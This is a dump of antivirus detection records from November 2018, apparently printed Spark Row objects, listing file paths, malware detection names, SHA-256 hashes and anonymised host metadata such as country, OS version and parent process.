  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='be4005c3715a02ad1004b49b450292a2876ca917bbc77f22151d51d2e59d2d95', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a781ed0c22dc58739d34fc72d3dfa264a48e99e96b5a529f23a3fa1eb7910751', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A781ED0C22DC58739D34FC72D3DFA264A48E99E96B5A529F23A3FA1EB7910751', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a781ed0c22dc58739d34fc72d3dfa264a48e99e96b5a529f23a3fa1eb7910751', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D41CC0D5F8B97B9ABDFD6CA61B10F159868BFAB17F7E1D94FB1A10ACD69E052', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae45b264ff026b15c9a14c9c3da29bde61c1163d70d4d03e7e6da30c67788439', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\AE45B264FF026B15C9A14C9C3DA29BDE61C1163D70D4D03E7E6DA30C67788439', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='ae45b264ff026b15c9a14c9c3da29bde61c1163d70d4d03e7e6da30c67788439', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:29:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{9899B8B5-C656-4816-903C-29C4185BF674}\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='8c2da0482680dbd488a83bff78066b4652194f51d3dd57a5e74b5600c6e66904', metadata=Row(cmdline='--engine=2 --session-id=PeYmHJHkM1PnbctX4ZzwyHhOgiDwrfrQsofLOJc4 --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-02T21:14:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083106-2752f7a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-083106-2752F7A8', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084019-7ab5d5f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-084019-7AB5D5F5', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp002931b6', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002931b6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие доп..exe', filepath='\\\\?\\F:\\Проф\\Бланк письма 2014 пособие доп..exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b1567728f7c9c301faf0e69894160bc87eea4da220c5850aa5f9d4863d75c3cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194526-516c9023', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d6ecda6b\\AVSCAN-20181104-194430-4890193E\\AVSCAN-20181104-194526-516C9023', filesize=476000, name='ADWARE/Adware.Gen.#M300.#R5899'), hash='cca939933535d17781df181347898638c06e7c8e4685e338b955b65c93437cc6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238bff', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238bff', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:30:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f66', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f66', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:21:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194141-48730c93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-194141-48730C93', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293ece', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293ece', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:32:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290439', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290439', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:30:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141352-9996e2b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e3a5be7\\AVSCAN-20181104-141308-90EDABDA\\AVSCAN-20181104-141352-9996E2B7', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c4cd3a36487e35ce02959549d2b1c013bea9b5b5cc764254261522448c70af7c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:13:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090923-dd98bf16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090923-DD98BF16', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:08:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d096', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d096', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:44:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='final.exe', filepath='F:\\\xa0\\final\\final.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:20:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151720-39c5d02f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151720-39C5D02F', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install.exe', filepath='\\\\?\\C:\\_GCafePRO\\Install.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='efff492fa9c08971d6e94cd9c048cf110233d66669f52d1568761113e2054bca', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:56:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:53:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='I:\\Program Files\\SPT\\Driver\\Samsung Agere GSM USB Driver Ver 4.20\\agsm_v4_20\\Setup.exe', filesize=2560000, name='W32/Ramnit.C.#M1.#R1'), hash='f5c5e86e3b9f64728e9252559049ba571d49a68e0a6edf959fd20927a2ec652c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:00:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130822-6c10ede9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-130822-6C10EDE9', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zlib.dll', filepath='D:\\العاب\\Mortal kombat 5\\Jewel Quest\\zlib.dll', filesize=236000, name='W32/Ramnit.C.#M1.#R1'), hash='f524a35e2a79d61f93412fbeba6d77758815b4a89d1dce5c778e12c4823bd743', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:34Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-4\\18E83D8D6C9B76BB9F9F63CB86479D711663D31F4EBEA678236ADB8C0DD59B4E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup(2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\wspsetup(2).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_946c4e8d.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_946c4e8d.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e4ef8ecb5e7ca94dadde2c0a14da7c8d7ea445e7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e4ef8ecb5e7ca94dadde2c0a14da7c8d7ea445e7', filesize=384000, name='Adware/DealPly.113c30.#M1.#R1'), hash='113c3076f8a6a1aedfa7ec4d95702ec63dbffe9dcb93dc85bef08c9b15783a48', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:19:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T11:34:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xodvql7dc.exe', filepath='C:\\Program Files\\XODVQL7DCT\\XODVQL7DC.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T15:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105759-84b3e8b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd051c61\\AVSCAN-20181102-105745-8243A86F\\AVSCAN-20181102-105759-84B3E8B8', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:09:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010763', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010763', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mylanviewer-setup.exe', filepath='\\\\?\\F:\\dossier\\Nouveau dossier\\MyLanViewer-setup.exe', filesize=3016000, name='W32/Neshta.A.#M1.#R1'), hash='660dfbd2d4443ae6a37d8c36444e13ac4cfc67a5f3e9f3ce6541795ca5e4e1d5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lockups.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Playing_the_Game\\Lockups\\Lockups.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155755-dfbe2849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155755-DFBE2849', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wizard_setupfailed.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\PanelGuide\\LT\\_files\\wizard_setupfailed.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='3026cb4eb5c428d2a39ed13ce94af8e73f11c38a0035ca17a6a465928d69fb5e', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T08:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073213-26c1f022', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-073213-26C1F022', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7186362\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:59:57Z'), dt=datetime.date(2018, 11, 2)),
